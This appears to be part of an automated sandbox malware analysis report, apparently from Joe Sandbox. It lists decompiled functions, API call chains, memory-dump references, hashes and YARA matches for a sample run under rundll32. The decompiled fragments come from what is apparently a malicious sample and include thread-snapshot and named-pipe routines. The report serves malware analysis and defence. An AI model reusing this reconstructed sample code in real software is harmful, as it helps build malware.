                                • Opcode Fuzzy Hash: 94a698a9a8576dc17ca1dd5cec89bbeacbfaec84778af4a445038ea9170e9c22
                                • Instruction Fuzzy Hash: 76218CBE7002459BDF11DE5AD881AAEB7B5BB8A350F18802BE511AF340DB70D841CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431B6F Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E03431B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x343a348; // 0x21ad5a8
				_t4 = _t15 + 0x343b3a0; // 0x55e8948
				_t20 = _t4;
				_t6 = _t15 + 0x343b124; // 0x650047
				_t17 = E034346CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E034359AE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                0x03431b79
                                0x03431b80
                                0x03431b81
                                0x03431b82
                                0x03431b83
                                0x03431b89
                                0x03431b8e
                                0x03431b8e
                                0x03431b98
                                0x03431baa
                                0x03431bb1
                                0x03431bdf
                                0x03431bb3
                                0x03431bb5
                                0x03431bba
                                0x03431bdc
                                0x03431bbc
                                0x03431bbf
                                0x03431bc6
                                0x03431bcb
                                0x03431bcd
                                0x03431bcd
                                0x03431bd2
                                0x03431bd2
                                0x03431bba
                                0x03431be6

                                APIs
                                  • Part of subcall function 034346CB: SysFreeString.OLEAUT32(?), ref: 034347AA
                                  • Part of subcall function 034359AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,03435EFA,004F0053,00000000,?), ref: 034359B7
                                  • Part of subcall function 034359AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,03435EFA,004F0053,00000000,?), ref: 034359E1
                                  • Part of subcall function 034359AE: memset.NTDLL ref: 034359F5
                                • SysFreeString.OLEAUT32(00000000), ref: 03431BD2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: a1ee41c12b48da6c87937dac47cc7ff2746270ad47359fbecc8010aecd480f89
                                • Instruction ID: 4d60af80ab422aa7ac32938b74b9f79d9480cb83c70e30d0754c8636ae3965a8
                                • Opcode Fuzzy Hash: a1ee41c12b48da6c87937dac47cc7ff2746270ad47359fbecc8010aecd480f89
                                • Instruction Fuzzy Hash: 85017C36500129BFDF11EFA9DC01EABBBB9FB09750F00056AE905EF160E3709922C7A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03432E4E Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 89%
                                			E03432E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E03431C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x343a348; // 0x21ad5a8
						_t9 = _t17 + 0x343ba40; // 0x444f4340
						_t20 = E03433B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x343a2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                0x03432e51
                                0x03432e57
                                0x03432eae
                                0x03432e5d
                                0x03432e68
                                0x03432e6d
                                0x03432e71
                                0x03432e7e
                                0x03432e86
                                0x03432e92
                                0x03432e9a
                                0x03432ea4
                                0x03432ea4
                                0x03432e71
                                0x03432eb3

                                APIs
                                  • Part of subcall function 03431C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 03431C1B
                                  • Part of subcall function 03433B58: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 03433B8C
                                  • Part of subcall function 03433B58: StrStrA.SHLWAPI(00000000,?), ref: 03433B99
                                  • Part of subcall function 03433B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 03433BB8
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,0343553D), ref: 03432EA4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Allocate$Freelstrlen
                                • String ID:
                                • API String ID: 2220322926-0
                                • Opcode ID: 640bf547a870da43b870aedba15770973e96ddcdde2fe66be871cc879d35a1fe
                                • Instruction ID: e4e1d8b834478ef8e5fe3a3669a576c62f762dd17acfa80d68259cb60a1a15ee
                                • Opcode Fuzzy Hash: 640bf547a870da43b870aedba15770973e96ddcdde2fe66be871cc879d35a1fe
                                • Instruction Fuzzy Hash: 8A01813A100608FFDB11DF44CC02FAA7BF9EB49250F14402AFA559F264E7B1EA55DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03485D7A Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034771B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771D3
                                  • Part of subcall function 034771B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0349A170,00000000,03485D81,?,0347F2F7,?), ref: 034771DE
                                  • Part of subcall function 034771B4: _wcsupr.NTDLL ref: 034771EB
                                  • Part of subcall function 034771B4: lstrlenW.KERNEL32(00000000), ref: 034771F3
                                • ResumeThread.KERNEL32(00000004,?,0347F2F7,?), ref: 03485D8F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                • String ID:
                                • API String ID: 3646851950-0
                                • Opcode ID: 1972fcab9162442a4fa7f1ff7c680bdd6ba11be2a57c404d1c96cd543772d13d
                                • Instruction ID: 5b18d1cb33506a292e7f806065f61714c241314333f02dc360103d055a1efc76
                                • Opcode Fuzzy Hash: 1972fcab9162442a4fa7f1ff7c680bdd6ba11be2a57c404d1c96cd543772d13d
                                • Instruction Fuzzy Hash: A1D05E3C204311AEEA22B711CD09B1F7DD29F82B48F14C4EBED859C261C3728890964C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03493083 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 03493090
                                  • Part of subcall function 034931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,03470000), ref: 0349325C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                • String ID:
                                • API String ID: 123106877-0
                                • Opcode ID: f6e32abacc6f27ae7466b71884c82d9aeae5744dd16fe67d761ce1e0a513a93f
                                • Instruction ID: 7808d85cc7c2ef4d74871a5c3345215beb3f951c6ce1f2a7fbd00f6de7508cee
                                • Opcode Fuzzy Hash: f6e32abacc6f27ae7466b71884c82d9aeae5744dd16fe67d761ce1e0a513a93f
                                • Instruction Fuzzy Hash: EFA0029D1D56017D7914D5515D47C3B1F1CC4D1921332891FF4619C05559471D450079
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0349309E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 03493090
                                  • Part of subcall function 034931E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,03470000), ref: 0349325C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                • String ID:
                                • API String ID: 123106877-0
                                • Opcode ID: 10d3859e5a96bf6075d54c8e9be992c2bae0b125d086eb25ae4e667799500661
                                • Instruction ID: f7c6fc166d4bc7fcc972ab125c353268c44395acb236103c2c875c9ae72ee93c
                                • Opcode Fuzzy Hash: 10d3859e5a96bf6075d54c8e9be992c2bae0b125d086eb25ae4e667799500661
                                • Instruction Fuzzy Hash: A7A0019E2A9202BD7918EA526D4BC3B1F1CC4C6A613328D2FE4628C055AA871E8A0079
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03479394 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 5db0048ba594203df91605a809d0992ef5bf46571ef1c8f58cdf10a2420c2ed8
                                • Instruction ID: 04f3af140f96b293593a87990dacf25516ee6d0544f4ab484c00daddd07cf046
                                • Opcode Fuzzy Hash: 5db0048ba594203df91605a809d0992ef5bf46571ef1c8f58cdf10a2420c2ed8
                                • Instruction Fuzzy Hash: 08B01271100100ABCA026F01DE05F057BA1A771700F124012B3086C06882310424FB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E803 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: e57246f125677fca0120ffbdd35deef28e47a2777dd278f759505b19f49e4d1a
                                • Instruction ID: 05e222da5178459062f16365f3d03327750d6587652a68d68a6341c5d545ff4e
                                • Opcode Fuzzy Hash: e57246f125677fca0120ffbdd35deef28e47a2777dd278f759505b19f49e4d1a
                                • Instruction Fuzzy Hash: F4B01231000100ABCA026F00DD06F057BA1AB71700F124412B208A806882310468FB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03436D63 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03436D63(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x343a2d8, 0, _a4); // executed
				return _t2;
			}




                                0x03436d6f
                                0x03436d75

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: e85ccf055c417962784c9dd16d773ffa0cf7aac32a55a169b64ee40450474aee
                                • Instruction ID: bdedb9f06dc8c814aad73cbef87a1bfe099c36bd30067d64e159f5f5da10708d
                                • Opcode Fuzzy Hash: e85ccf055c417962784c9dd16d773ffa0cf7aac32a55a169b64ee40450474aee
                                • Instruction Fuzzy Hash: 0BB01231044200BBCA016B00DD08F457BB1B750700F004010B644A91F883730470FB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03436C2C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03436C2C(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x343a2d8, 0, _a4); // executed
				return _t2;
			}




                                0x03436c38
                                0x03436c3e

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 55258dadde90c0e336740793b9e9700582964be33809af1c03ef0e64c8e988f4
                                • Instruction ID: 3f3f81e0034ae2f65f1e9aa7d3e9fb16bd71a46376799d6c1ec3ec4c800a4908
                                • Opcode Fuzzy Hash: 55258dadde90c0e336740793b9e9700582964be33809af1c03ef0e64c8e988f4
                                • Instruction Fuzzy Hash: 83B01275144200ABCB116F00DE04F057AB1A750700F004010B354690F883720430FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034313C7 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034313C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E03436FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E03436D63(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E03436C2C(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E03436EE7(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E03435FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                0x034313d2
                                0x034313d5
                                0x034313dc
                                0x034313df
                                0x034313e2
                                0x034313e7
                                0x034314e3
                                0x034314e7
                                0x034313f9
                                0x03431405
                                0x0343140c
                                0x03431413
                                0x00000000
                                0x00000000
                                0x03431419
                                0x03431421
                                0x00000000
                                0x00000000
                                0x03431427
                                0x03431430
                                0x03431434
                                0x00000000
                                0x00000000
                                0x03431436
                                0x0343143d
                                0x03431442
                                0x03431445
                                0x03431447
                                0x034314c8
                                0x034314cf
                                0x034314d1
                                0x00000000
                                0x00000000
                                0x034314d3
                                0x034314d7
                                0x034314dc
                                0x034314dc
                                0x00000000
                                0x034314d7
                                0x0343144e
                                0x03431456
                                0x03431456
                                0x0343145f
                                0x0343146d
                                0x034314c4
                                0x034314c4
                                0x00000000
                                0x03431490
                                0x03431493
                                0x00000000
                                0x03431493
                                0x0343146d
                                0x034314a2
                                0x034314b0
                                0x034314b5
                                0x034314b7
                                0x034314cc
                                0x00000000
                                0x034314cc
                                0x034314b9
                                0x034314bf
                                0x034314c2
                                0x00000000
                                0x00000000
                                0x00000000
                                0x034314c2

                                APIs
                                • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 0343144E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                • Instruction ID: cc0388de929826e92f69ac4db1c04c836891d9d286c607819b1f5830603b99c1
                                • Opcode Fuzzy Hash: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                • Instruction Fuzzy Hash: A1317671900219FFDF21EF94C9C0BEEB7B8BB1A304F1445AAE509AB241D6349E45CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00F31FCF Relevance: 1.3, APIs: 1, Instructions: 86memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.462745611.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f30000_rundll32.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 42bfce4ad4a4c9919c046fb102624acd987536cc5573b600d70b21d263cdb303
                                • Instruction ID: 73de1b809aab9b574106fe46f392afd19d5e117482ae15706c65cfbb1b37ad19
                                • Opcode Fuzzy Hash: 42bfce4ad4a4c9919c046fb102624acd987536cc5573b600d70b21d263cdb303
                                • Instruction Fuzzy Hash: A741F2B49002068FDB44DF68C5947AEBBF0FF48314F24856DD858AB341E77AA946CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348FD24 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,0347E30A,?), ref: 0348FDB6
                                  • Part of subcall function 0348AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,034763CD,00000000,00000001,-00000007,?,00000000), ref: 0348AFA6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                • String ID:
                                • API String ID: 1301464996-0
                                • Opcode ID: 28c7c96f79f21d3eb83963182ec8419c5cf81b66132c869af16676dc60c5ede5
                                • Instruction ID: 8e9747e2ac87d18ef2c62f9d9f9e5111a3c147bdd2f497c2d58162dcf986c243
                                • Opcode Fuzzy Hash: 28c7c96f79f21d3eb83963182ec8419c5cf81b66132c869af16676dc60c5ede5
                                • Instruction Fuzzy Hash: 4E11A376A10201AFDB55FB49EC81EAE77E9EF98314F10006BEA02EF341D7749D458B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03482BFD Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(?,0349A324,00000018,03486FFC,06168E36,?,03486FFC,06168E36,?,03486FFC,06168E36,?,?,?,?,03486FFC), ref: 03482CB2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: b671f044b674ce46cc21df945d77e5c175128f7813103d335cd6800df9ea65e1
                                • Instruction ID: c66d135ab7a4860f8724d1672d3351ddbf2c0b6443ef964c6efdb105cad22b96
                                • Opcode Fuzzy Hash: b671f044b674ce46cc21df945d77e5c175128f7813103d335cd6800df9ea65e1
                                • Instruction Fuzzy Hash: 73118671500105BFDB34FF5AEC86CAA3BE9E7AD214748822BEC18AF355DB316511CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347708F Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 03477100
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474975
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,00000020,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474984
                                  • Part of subcall function 0347EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0347EE2A
                                  • Part of subcall function 0347EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0347EE36
                                  • Part of subcall function 0347EE04: GetModuleHandleA.KERNEL32(?,0616978E,00000000,?,00000000), ref: 0347EE56
                                  • Part of subcall function 0347EE04: GetProcAddress.KERNEL32(00000000), ref: 0347EE5D
                                  • Part of subcall function 0347EE04: Thread32First.KERNEL32(?,0000001C), ref: 0347EE6D
                                  • Part of subcall function 0347EE04: CloseHandle.KERNEL32(?), ref: 0347EEB5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                • String ID:
                                • API String ID: 2627809124-0
                                • Opcode ID: 64f4c492db23f35b7c4bae630663bddb5876a6eccdc504bf21db16bc345b400c
                                • Instruction ID: 04160dbadd3918819ff01ec8497054ed1b361d8aacb06c4b8383bdae6e4d9b1e
                                • Opcode Fuzzy Hash: 64f4c492db23f35b7c4bae630663bddb5876a6eccdc504bf21db16bc345b400c
                                • Instruction Fuzzy Hash: 41018B75610204BFDB11EBAADC85CEFBBECEF65244704006BF401BB204DA30AE04DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0349157A Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,034804AC,0348C384,00000000,00000000), ref: 034915F0
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474975
                                  • Part of subcall function 03474963: StrChrA.SHLWAPI(?,00000020,?,00000000,034770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 03474984
                                  • Part of subcall function 03473172: lstrlen.KERNEL32(034743C6,00000000,?,?,?,?,034743C6,00000035,00000000,?,00000000), ref: 034731A2
                                  • Part of subcall function 03473172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034731B8
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,034743C6,00000000,?,?,034743C6,00000035,00000000), ref: 034731EE
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,00000000,00000035,?,?,034743C6,00000035), ref: 03473209
                                  • Part of subcall function 03473172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03473227
                                  • Part of subcall function 03473172: GetLastError.KERNEL32(?,?,034743C6,00000035), ref: 03473231
                                  • Part of subcall function 03473172: HeapFree.KERNEL32(00000000,00000000,?,?,034743C6,00000035), ref: 03473254
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
